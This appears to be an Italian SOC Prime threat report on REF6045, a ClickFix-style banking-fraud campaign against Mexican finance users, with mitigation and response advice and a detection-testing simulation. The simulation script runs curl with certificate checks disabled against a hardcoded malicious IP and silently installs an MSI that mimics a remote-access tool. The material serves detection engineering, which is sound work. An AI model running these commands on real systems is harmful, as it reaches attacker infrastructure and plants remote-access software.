SOC Prime Bias: Alto

08 Jul 2026 16:15 UTC

ClickFix per Incasso: Analisi di un Toolkit di Frodi Bancarie Messicano

Author Photo
SOC Prime Team linkedin icon Segui
ClickFix per Incasso: Analisi di un Toolkit di Frodi Bancarie Messicano
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

REF6045 è una campagna di frode bancaria assistita da operatori che si concentra sul settore finanziario messicano. Utilizza un metodo di consegna in stile ClickFix con pagine CAPTCHA false per convincere le vittime a eseguire comandi PowerShell dannosi. Dopo l’infezione, il toolkit SCMBANKER consente agli operatori umani di osservare sessioni bancarie, acquisire screenshot, modificare i contenuti degli appunti e distribuire Remote Utilities RAT per il pieno controllo remoto.

Indagine

Elastic Security Labs ha scoperto la minaccia dopo aver rilevato attività sospette bitsadmin scaricando script PowerShell da una directory aperta. L’indagine ha esposto l’intero toolkit attraverso un archivio web-root accessibile pubblicamente, zkt.zip, e ha rivelato gravi debolezze di sicurezza operativa, inclusi editor di file non autenticati e directory aperte sull’infrastruttura di comando e controllo. L’analisi ha anche mostrato che il toolkit contiene numerosi artefatti generati da AI nella sua base di codice.

Mitigazione

Le organizzazioni dovrebbero limitare l’uso di PowerShell e bitsadmin agli utenti approvati e imporre controlli rigorosi di esecuzione. Gli utenti dovrebbero essere addestrati a identificare esche di ingegneria sociale come falsi prompt CAPTCHA o falsi schermi di aggiornamento di Windows. I team di sicurezza dovrebbero anche implementare un forte monitoraggio per modifiche sospette al registro e installazioni non autorizzate di software di accesso remoto.

Risposta

Se viene rilevata questa attività, isolare immediatamente i sistemi interessati per fermare la comunicazione di comando e controllo e il possibile furto di dati. Eseguire un’indagine forense per determinare l’entità del compromesso e verificare la presenza di Remote Utilities o modifiche non autorizzate al registro. Reimpostare le password per tutti i conti finanziari e altri account sensibili accessibili dai computer compromessi.

Flusso di Attacco

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre-flight di Telemetria & Baseline deve essere superato.

Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare esattamente la telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa & Comandi di Attacco: L’avversario mira a stabilire un punto d’appoggio sul sistema bersaglio imitando il pattern di frode bancaria REF6045. Per prima cosa, tentano di scaricare un file di convalida da un indirizzo IP maligno hardcoded (68.211.161.46) usando curl con il flag -k (insecure) per bypassare la validazione del certificato SSL. Dopo il download, l’avversario esegue un’installazione silenziosa di uno strumento di accesso remoto maligno utilizzando msiexec.exe con il flag /i (install) e /quiet (silenzioso) targeting un file denominato hosts.msi. Questo fornisce loro un accesso remoto persistente riducendo al minimo l’interazione dell’utente.

  • Script Test Regressione:

    # Script di Simulazione per TTP REF6045
    # Questo script imita le specifiche linee di comando definite nella regola di rilevamento.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] Passaggio 1: Simulazione del Trasferimento Strumenti Ingressi tramite curl..." -ForegroundColor Cyan
    # Nota: utilizzando un file falso tramite curl per evitare traffico effettivamente dannoso,
    # ma mantenendo la stringa esatta della linea di comando richiesta per il rilevamento.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] Passaggio 2: Simulazione dell'Installazione MSI Silenziosa..." -ForegroundColor Cyan
    # Creare un file MSI fittizio in modo che msiexec non dia immediatamente errori (anche se il rilevamento si innesca sulla linea di comando)
    # Per il solo scopo di testare la LOGICA DI RILEVAMENTO (la linea di comando),
    # eseguiamo la stringa di comando esatta.
    msiexec /i "hosts.msi" /quiet /norestart
  • Comandi di Pulizia:

    # Script di pulizia per rimuovere gli artefatti
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] Pulizia completata: $WorkDir rimosso." -ForegroundColor Green
    } else {
        Write-Host "[!] Pulizia saltata: Directory non trovata." -ForegroundColor Yellow
    }